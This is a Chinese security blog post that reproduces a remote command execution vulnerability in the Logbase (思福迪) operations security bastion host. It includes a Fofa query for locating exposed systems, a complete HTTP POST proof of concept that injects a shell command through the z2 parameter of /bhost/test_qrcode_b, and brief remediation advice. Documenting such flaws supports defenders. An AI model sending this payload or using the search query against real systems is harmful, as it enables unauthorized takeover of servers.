【漏洞复现】思福迪 (Logbase)运维安全管理系统 test_qrcode_b RCE

于 2024-07-11 08:00:00 发布
阅读量279 收藏 2
点赞数 10
分类专栏: 漏洞复现 文章标签: 运维 安全 网络 web web渗透 web安全 漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_41924764/article/details/140253824
版权

免责声明:

        本文内容旨在提供有关特定漏洞或安全漏洞的信息,以帮助用户更好地了解可能存在的风险。公布此类信息的目的在于促进网络安全意识和技术进步,并非出于任何恶意目的。阅读者应该明白,在利用本文提到的漏洞信息或进行相关测试时,可能会违反某些法律法规或服务协议。同时,未经授权地访问系统、网络或应用程序可能导致法律责任或其他严重后果。作者不对读者基于本文内容而产生的任何行为或后果承担责任。读者在使用本文所提供的信息时,必须遵守适用法律法规和相关服务协议,并独自承担所有风险和责任。

产品简介

思福迪运维安全管理系统是思福迪开发的一款运维安全管理堡垒机。

漏洞描述

思福迪运维安全管理系统 test_qrcode_b 路由存在命令执行漏洞,可以导致服务器被攻击者远控。

网络空间测绘

Fofa

((title="Logbase" || header="Server: dummy" || body="οnclick=\"location.href='trustcert.cgi'") && body!="couchdb") || banner="Server: dummy"

image.png

漏洞复现

POST /bhost/test_qrcode_b HTTP/1.1
Host: 127.0.0.1
Content-Type: application/x-www-form-urlencoded
Referer: https://60.29.92.77:8444
User-Agent: Go-http-client/1.1
Content-Length: 27
Accept-Encoding: gzip, deflate, br
Connection: close

z1=1&z2="|whoami;"&z3=bhost

image.png

修复建议

1、如⾮必要,禁⽌公⽹访问该系统。
2、通过防⽕墙等安全设备设置访问策略,设置⽩名单访问。
3、升级产品到最新版本

凝聚力安全团队
关注
  • 10
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
思福迪运维安全管理系统 test_qrcode_b RCE漏洞复现
0xSec
12-12 1482
由于思福迪运维安全管理系统test_qrcode_b路由存在命令执行漏洞,攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个 web 服务器。
思福迪Logbase运维安全管理系统test_qrcode_b接口存在远程命令执行漏洞 附POC
nnn2188185的博客
12-18 613
思福迪Logbase运维安全管理系统test_qrcode_b接口存在远程命令执行漏洞 附POC
二维码劫持原理及恶意行为分析
weixin_50464560的博客
11-26 1907
*严正声明:本文仅用于教育和技术讨论目的,严禁用于非法用途。*本文作者:VoltCary,本文属 FreeBuf 原创奖励计划,未经许可禁止转载。之前看过其他的二维码登陆劫持漏洞,有的地方写的不是很详细,花了不少时间去研究二维码的原理,才弄懂漏洞。为了照顾更多入门新手,以本人的理解重新总结一遍,二维码登陆原理不是这里的主题,不过有必要熟悉一下流程。1.打开登陆地方,选择扫描二维码登陆,此时加载二维码;2.客户端开始轮询,即与服务器建立长连接,来检测二维码状态;3.用户打开手机扫描二维码,此时二维码为“sca
思福迪 运维安全管理系统 test_qrcode_b 远程命令执行漏洞
Innocence_0的博客
04-08 789
1.手动复现免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。
二维码新漏洞出现,遇到此类二维码小心中招
weixin_34361881的博客
08-01 669
二维码新漏洞出现,遇到此类二维码小心中招。二维码已经成为我们生活中常见的图形标志,由于二维码功能强大,包含的信息很多,不论支付、信息识别,亦或者其他场合,都能见到二维码的身影,例如支付宝、微信,以及各种链接和app等等。 (图中二维码与本文无关,作者已处理,请勿扫描) 然而二维码功能虽然强大,但是也有它的弊端。由于二维码上的信息对人眼来说,有点类似与密...
思福迪Logbase运维安全管理系统test_qrcode_b接口远程命令执行漏洞漏洞复现 [附POC]
薛定谔嘚喵博客
12-21 897
思福迪Logbase运维安全管理系统思福迪开发的一款运维安全管理堡垒机。其主要功能为实现对运维人员远程操作服务器、网络设备、数据库过程的授权、监控与审计,实现对IT运维过程的全面监管。支持对多种远程维护方式的支持,如字符终端方式(SSH、Telnet、Rlogin)、图形方式(RDP、X11、VNC、Radmin、PCAnywhere)、文件传输(FTP、SFTP)以及多种主流数据库的访问操作。该系统存在远程命令执行漏洞
思福迪 运维安全管理系统 test_qrcode_b 远程命令执行漏洞
weixin_62352348的博客
01-15 412
思福迪 运维安全管理系统 test_qrcode_b 远程命令执行漏洞
思福迪运维安全管理系统 test_qrcode_b 命令执行
weixin_43567873的博客
03-08 45
思福迪运维安全管理系统 test_qrcode_b 命令执行
QRCODE3-Test_qrcode_test_
10-03
"QRCODE3-Test_qrcode_test_" 这个标题可能指的是一个关于二维码生成器的测试项目,用于验证或评估二维码生成过程的准确性和效率。描述中的"Generator qr code test"进一步确认了这是一个关于二维码生成的测试工具。...
Delphi_QRCODE.rar_QRCODE_QRCode.dcr_delphi qrcode_delphi 二维码_qrc
09-25
3. **生成二维码**:调用`QRCode1.Generate`方法,系统会根据设定的参数生成对应的二维码图像。 4. **显示或保存二维码**:可以将生成的二维码显示在TImage控件上,或者通过流对象保存为图片文件。 四、源代码解析...
QRCode.zip_openvc一扫码_qrcode开源库_二维码 opencv_二维码 zbar_二维码opencv
07-15
【标题】"QRCode.zip_openvc一扫码_qrcode开源库_二维码 opencv_二维码 zbar_二维码opencv" 提供了一个关于使用OpenCV和ZBar库进行二维码扫描的项目实例。这个压缩包包含了一个名为"QRCode"的解决方案文件(QRCode....
QrCodeUtil.zip_QRCODE_qrcode utild_二维码生成
09-24
在IT行业中,二维码(QrCode)是一种广泛应用于数据传输、信息存储和快速扫描的二维条形码。本文将深入探讨如何使用Java编程语言来生成二维码图片,主要基于提供的资源"QrCodeUtil.zip",这是一个包含名为...
openEuler系统之使用Keepalived+Nginx部署高可用Web集群
jks212454的博客
07-05 588
openEuler系统之使用Keepalived+Nginx部署高可用Web集群
昇腾环境下使用docker部署mindie-service
yuanlulu的博客
07-08 296
MindIE是基于昇腾硬件的运行加速、调试调优、快速迁移部署的高性能深度学习推理框架。它包含了MindIE-Service、MindIE-Torch和MindIE-RT等组件。我主要用MindIE-Service的功能,这个组件对标的是vllm这样的大语言推理框架。
【分布式系统】ELK 企业级日志分析系统
F12138X的博客
07-06 1058
纵使黑夜吞噬了一切,太阳还是可以重新回来
使用WinSCP工具连接Windows电脑与Ubuntu虚拟机实现文件共享传输
qianniulaoren的博客
07-06 377
使用WinSCP工具来连接Windows主机和Ubuntu虚拟机,实现文件的共享和传输
RedHat运维-Ansible自动化运维基础11-when条件判断
a15735748145a的博客
07-09 685
17. 写一个playbook文件,不使用and关键字,当事实ansible_facts.distribution的值是CentOS,并且ansible_facts.memory_mb.real.free的值大于700时,运行任务,反之不运行;16. 写一个playbook文件,当事实ansible_facts.distribution的值是CentOS,并且ansible_facts.memory_mb.real.free的值大于700时,运行任务,反之不运行;12. 任务名称和任务使用到的模块的后面。
不运行容器,如何直接将镜像中的文件拷贝出来?
最新发布
一起加油吧
07-10 107
通过这种方法,你可以直接从 Docker 镜像中获取文件,而无需启动完整的容器实例。这种方式比传统的先运行容器再拷贝文件的方法更为高效和直接。这会将容器 temp-container 中的 /etc/nginx/nginx.conf 文件拷贝到当前工作目录 (.)。使用 docker container cp 命令从容器中拷贝需要的文件或目录到本地文件系统。这会创建一个名称为 temp-container 的容器,但它处于停止状态。这会删除名为 temp-container 的容器。
nuo_qrbarcode、f_qrcode_create
09-25
nuo_qrbarcode是一款基于Python的二维码生成库,可以用来创建各种类型的二维码。通过nuo_qrbarcode库,我们可以生成含有文本、URL链接、联系方式、地理位置、Wi-Fi网络等信息的二维码。它提供了丰富的参数选项,如二维码大小、颜色、背景颜色、边框宽度等,可以根据需求自定义二维码的外观。 f_qrcode_create是一个函数,用于在程序中调用nuo_qrbarcode库来生成二维码。该函数接受输入参数,如文本内容、二维码大小等,并返回生成的二维码图像。通过调用f_qrcode_create函数,我们可以方便地在我们的程序中生成二维码。 使用nuo_qrbarcode和f_qrcode_create,我们可以轻松地在各种应用场景中生成二维码。例如,我们可以用它来生成商品的二维码,方便顾客通过扫描二维码获取更多信息;我们也可以用它来生成活动的二维码,方便参与者通过扫描二维码注册或获取活动信息;另外,我们还可以用它来生成个人名片的二维码,方便他人通过扫描二维码获取我们的联系方式。 总之,nuo_qrbarcode和f_qrcode_create为我们提供了一种简单易用的生成二维码的方式,可以帮助我们在各种场景中应用二维码技术,方便用户获取信息、参与活动或获取联系方式。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

凝聚力安全团队

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值